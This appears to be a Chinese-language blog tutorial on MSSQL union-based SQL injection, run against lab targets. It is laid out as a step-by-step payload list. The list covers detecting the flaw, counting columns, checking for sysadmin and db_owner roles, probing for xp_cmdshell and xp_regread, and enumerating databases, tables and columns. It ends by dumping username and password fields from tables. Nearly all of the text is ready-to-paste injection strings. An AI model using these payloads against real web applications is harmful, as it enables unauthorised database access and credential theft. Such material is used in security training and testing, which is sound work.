MSSQL之联合注入

本章目录:

联合查询注入语句

  • 第一步 判断注入

    and 1=1

    and 1=2

  • 第二步 猜解列数(字段长度)

    order by 1 返回正确

    order by 2 返回正确

    order by 3 出现错误

    ?id=-2union all select null,null,null,null--
    //在第四个的时候页面显示正常,说明字段为4

    ?id=2and 1=(select is_srvrolemember(‘sysadmin’))
    //判断是否是系统管理员

    ?id=2and 1=(select is_srvrolemember(‘db_owner’))
    //判断是否是库权限

    ?id=2and 1=(select is_srvrolemember(‘public’))
    //判断是否为public权限

    可以直接不用加 - 报错

    判断回显位的位置:?id=-2union all select ‘1’,‘2’,‘3’,‘4’-- 页面显示2,3,说明回显点为2,3字段处

利用回显点权限判断

?id=-1073UNION ALL SELECT NULL, 回显点 ,NULL,NULL--
//一般都是代入在这语句的回显点中

其实这里面在后面添加的--或者#是因为代入数据库查询的时候系统可能会给你附加一些语句,这些语句都有可能会影响你的代码,所以就可以加这个注释掉。

  • @@version //主机版本

  • system_user //系统用户名

  • suser_sname() //查出当前操作数据库的登入名

  • user //当前用户名

  • db_name() //当前数据库名

    db_name(7) //快速查询库名,1-6为系统库,7开始为其他库

  • (select host_name()) //主机名

  • (select count(*) from master.dbo.sysobjects where xtype=‘X’ and name=‘xp_cmdshell’)

//判断是否有xp_cmdshell扩展存储,1为存在

  • 同理:(select count(*) from master.dbo.sysobjects where name=‘xp_regread’)

//判断是否有xp_regread扩展存储,1为存在

查库:

  • (select name from master.dbo.sysdatabases where dbid=7)
    //修改dbid数值,快速查询库名,1-6为系统库

查表:

  • (select top 1 name from sysobjects where xtype=‘U’) //查询当前库第一个表名

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in (‘表名1’,‘表名2’)) //查询其他表

  • (select top 1 table_name from master.information_schema.tables) //查询master库第一个表名

  • (select top 1 name from bbs.dbo.sysobjects where xtype=‘U’) //查询bbs库第一个表名

  • (select top 1 table_name from information_schema.tables where table_name not in (‘表名1’,‘表名2’)) //查询其他表(不包括)

  • (select name from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

  • (select ‘|’%2bname%2b’|’ from sysobjects where xtype=‘U’ FOR XML PATH(’’)) //快速查询所有表

同上一条,这是过滤用的,将空格编码化了

  • (select top 1 name from sysobjects where xtype=‘U’ and name not in(select top 0 name from sysobjects where xtype=‘u’))
    ///(select top 0 name from ) 变化0来快速查询

墨者学院例,查表名:
?id=-1073UNION ALL SELECT NULL,(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=‘dbo’),NULL,NULL--
//结果:manage

查列名:

  • (select top 1 name from syscolumns where id=object_id(‘admin’))
    //查询当前库admin表的第一个列名

  • (select top 1 name from syscolumns where id=object_id(‘admin’) and name not in(‘列名1’,‘列名2’)
    //查询当前库admin表的其他列名(也是不包括原理)

  • (select top 1 column_name from information_schema.columns where table_name=‘admin’ and column_name not in(‘列名1’,‘列名2’))
    //查询当前库admin表的其他列名

  • (select name from syscolumns where id=object_id(‘admin’) FOR XML PATH(’’))
    //快速查询所有列

例:
?id=-2union all select ‘1’,(select top 1 col_name(object_id(‘manage’),3) from sysobjects),‘1’,‘1’--
//根据col_name()函数中的数字来决定显示的字段,1对应id,2对应username,3对应password

查列内容:

例:

  • ?id=-2union all select null,username,password,null from manage--
    ///直接代列名到回显点里面,然后from 表名--

  • (select password,username from manage FOR XML PATH(’’))
    //快速查询manage表里所有值

  • (select top 1 password from admin where password not in (‘值1’,‘值2’))
    //查询其他值

  • (select top 1 password from bbs.dbo.admin)
    //查询bbs库admin表password列的第一个值

-----------------------------------------------------------------------------------------------------------------

联合注入例:

mssql联合注入我们一般不使用 数字占位,而是null,因为你使用数字占位可能会发生隐式转换


http://192.168.130.137/1.aspx?id=1 union select 1,2,3

MSSQL之联合注入


http://192.168.130.137/1.aspx?id=1 union select null,name,pass from info

MSSQL之联合注入

当然也可以这样用


http://192.168.130.137/1.aspx?id=1 SELECT 1 UNION (select CAST(USER as int))

MSSQL之联合注入

在mssql中我们如果想查询多条数据可以使用%2B 也就是加号

http://192.168.130.137/1.aspx?id=1 union select null,name%2Bpass,null from info

MSSQL之联合注入

上一篇:CentOS7下安装sqlServer2017


下一篇:MSSQL Server编写存储过程小工具(二)